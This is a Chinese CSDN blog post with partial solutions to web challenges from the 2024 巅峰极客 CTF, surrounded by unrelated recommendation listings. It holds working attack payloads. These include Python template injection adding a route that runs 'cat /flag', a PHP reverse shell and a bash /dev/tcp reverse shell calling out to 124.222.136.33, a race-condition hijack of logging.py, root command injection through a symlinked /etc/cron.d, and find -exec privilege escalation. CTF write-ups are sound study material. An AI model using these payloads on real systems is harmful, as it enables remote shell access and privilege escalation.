【Web】巅峰极客2024 部分题解

已于 2024-08-17 21:07:07 修改
阅读量380 收藏 2
点赞数 13
文章标签: CTF WEB 巅峰极客 WP 2024
于 2024-08-17 20:04:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/141285560
版权

目录

EncirclingGame

GoldenHornKing 

php_online 

admin_Test

EncirclingGame

玩赢游戏就行

GoldenHornKing 

利用点在传入的app

 可以打python内存马

/calc?calc_req=config.__init__.__globals__['__builtins__']['exec']('app.add_api_route("/flag",lambda:__import__("os").popen("cat /flag").read());',{"app":app})

访问./flag

也可以挂载静态文件

/calc?calc_req=lipsum.__globals__['__builtins__'].exec("from fastapi.staticfiles import StaticFiles;app.mount('/static', StaticFiles(directory='/'), name='static')", {"app": app})

访问./static/flag

php_online 

先起一个id为aaaaaaa1的沙箱,反弹shell

<?php system('php -r \'$sock=fsockopen("124.222.136.33",1337);exec("sh <&3 >&3 2>&3");\'');?>

再起一个id为aaaaaaa2的沙箱,使得/sandbox/aaaaaaa2存在

再在aaaaaaa1环境里运行sh脚本条件竞争让init.py里import的恶意logging.py存在

init.py 中的logging会优先应用同目录下的logging.py,而非logging三方库

echo "__import__('os').popen('bash -c \"bash -i >& /dev/tcp/124.222.136.33/1338 0>&1\"')" > /tmp/logging.py
echo "while true; do" >> /tmp/exp.sh
echo "    cp /tmp/logging.py /sandbox/aaaaaaa2/logging.py" >> /tmp/exp.sh
echo "done" >> /tmp/exp.sh
chmod +x /tmp/exp.sh
sh /tmp/exp.sh

运行sh脚本后再进入aaaaaaa2环境,随便传一个<?php echo 1;?>触发sudo -u www-data python3 init.py

运行恶意logging.py后反弹shell拿到www-data权限

ps-aux

发现开着定时任务

开一个id为aaaaaaa3的沙箱

ln -s /etc/cron.d /sandbox/aaaaaaa3

再软链接定时任务目录

最后在aaaaaaa3的沙箱传入phpcode

* * * * * root cat /flag > /tmp/flag
# <?php sleep(1000);?>

<?php sleep(1000);?>是为了避免rm *将/sandbox/aaaaaaa3/phpcode给瞬删,从而给定时任务运行充足的时间

admin_Test

扫出来./admin.html

访问./admin.html

 可以上传文件,可以执行命令

命令部分fuzz出来的可用字符为t * . /,一眼执行临时文件. /t*/*

参考无字母数字rce(ctfshow web入门56)_过滤所有字母和数字的rce-CSDN博客

 

可以命令执行

但没法读/flag,考虑提权

可以打find提权

touch anyfile #必须要有这个文件
find anyfile -exec whoami \;

 

Z3r4y
关注
  • 13
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
某乎问答回答过教育类问题的用户里有多少用户回答过职场类问题
2301_79125642的博客
10-09 345
在国庆假期面的,跟一面隔了8天,0-40分钟:自我介绍+项目经历+岗位知识,40-50分钟:介绍部门,50-55分钟:反问+非专业提问,面试官全程没有开摄像头,本人刚刚升本到民办本科,大三有四个月的实习(JAVA后端开发),公司用的是若依框架,接手过3个外包项目,工作一个月后感觉就没什么提升了(每天crud),个人的技。开始写毕设了,虽然小论文拼拼就行,状态还是被搞得贼烂了(课题组的事,真的懂得都懂)拒了好几个因为地域、工作内容等感觉不会去的约面(s微旭,1飞,踏子……我们其实一想到的就是锁,我们在ja。
西普WEB部分题解
12-09
【标题】"西普WEB部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
2023巅峰极客 unserialize wp
qing_chuan_的博客
08-10 300
前面逃逸出来的这些字符已经变成username串中的一部分了,我们在pwd中也需要加入这些进行闭合(这里的%00我们不能直接这么写,需要编码后才为%00,所以我们可以先写成\000,这个是8进制的写法,然后编码之后就能转为%00,但是在php中需要使用双引号才能识别\000)O:7:“push_it”:2:{s:13:“%00push_it%00root”;
极客大挑战2023 Web方向题解wp
Jay17的博客
11-28 4849
极客大挑战2023 Web方向题解wp
Buuctf-Web-[极客大挑战 2019]Havefun 题解&思路总结
m0_62239233的博客
06-01 1439
网页传参。
Misc一起学生物--【中国电信2023巅峰极客网络安全技能挑战赛】
Laffrey的专栏
07-22 364
题目下载分享一首很坑的Misc题解wp
id 0e1union mysql_史上最水的MYSQL注入总结
weixin_26833139的博客
03-04 244
[TOC]0x1 Forward​ 这篇文章的雏形我是发在了t00ls,后来我想了下还有其他挺有意思的内容还没总结进来,于是就有了一篇升级版(ps水货本质还是没变),希望有需要的师傅可以阅读看看。0x2 MySQL 基础知识1.字符串截取函数left(str,index) //从左边第index开始截取right(str,index) //从右边第index开始截取substring(str...
SQL注入之MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2145
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
含有历年来天梯赛部分题解
03-05
每题上方为题目序号,代码为题解部分题解有另法
西北工业大学 NOJ 部分难题题解
01-06
【标题】:“西北工业大学 NOJ 部分难题题解” 【内容详解】 “西北工业大学 NOJ(Northwest Polytechnic University Online Judge)部分难题题解”是一个专门为编程爱好者和学习者提供的资源,旨在帮助他们解决 ...
ural部分题解
10-25
"ural部分题解"是一个关于编程竞赛平台Ural(也称为URAL Online Judge或University of Maribor Algorithmic contests)的解题集,由大牛出品。这个资源包含Vol1到Vol3的部分题目解答,虽然不完整,但大约涵盖了200道...
CyBRICS CTF Quals 2019 Web 题解1
08-04
在CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
新型智慧城市项目技术方案(2283页).pdf
08-16
新型智慧城市项目技术方案(2283页)
openssh windows安装程序
08-16
openssh windows安装程序
java-团员管理系统(源码+数据库+论文).rar
08-16
共青团员做为我们先进积极分子的培养对象,是未来党人和民的重点培养对象。但随着知识和认识的不断提高,越来越多的青少年选择积极入团,由此而引发的团员管理也成为当下需要解决的问题。日益成熟的互联网技术大大推动了共青团信息化建设的发展,此次毕业设计就是要通过技术的手段来实现团员的信息化管理。 那么业务实现就是为了实现共青团团员的管理系统,那么技术上我们采用的手段还是以目前主流的Java技术为主,那么采用的框架是SSM框架,这样一来更加方便的进行一个团员信息的管理。数据库方面我们使用的是MYSQL数据库,可以有效的快速上手,容易我们开发。 关键词:SSM框架;信息技术;团员管理;
vb+access高校固定资产管理系统(论文+程序).zip
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
Linux基础篇系列一:安装VMWare
最新发布
08-16
Linux基础篇系列一:安装VMWare
Tableau-用铅笔柱形图对比数据
08-16
资源内包含Tableau的twbx模板文件,有需要的小伙伴可以自行下载使用,如需查看视频讲解可以访问西瓜视频:https://www.ixigua.com/home/2506516376848260/video/?preActiveKey=pseries&list_entrance=userdetail 或者哔哩哔哩:https://space.bilibili.com/630399480?spm_id_from=333.1007.0.0
ccpc东北赛2024题解
07-15
对不起,由于CCPC (China Collegiate Programming Contest) 的题目通常会随着赛事更新而变化,我无法提供具体的2024年东北赛区的题解信息。CCPC的题目涵盖了算法、数据结构等各种计算机科学基础知识,解决这类问题通常需要深入理解编程语言、算法设计以及问题分析技巧。 如果你对某个特定的编程题或者常见题型感兴趣,比如动态规划、图论、字符串处理等,我可以帮助你理解和解答一般性的策略或者提供相关练习题的思路。如果你有具体的题目想要讨论,可以描述一下题目内容,我会尽力为你解析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值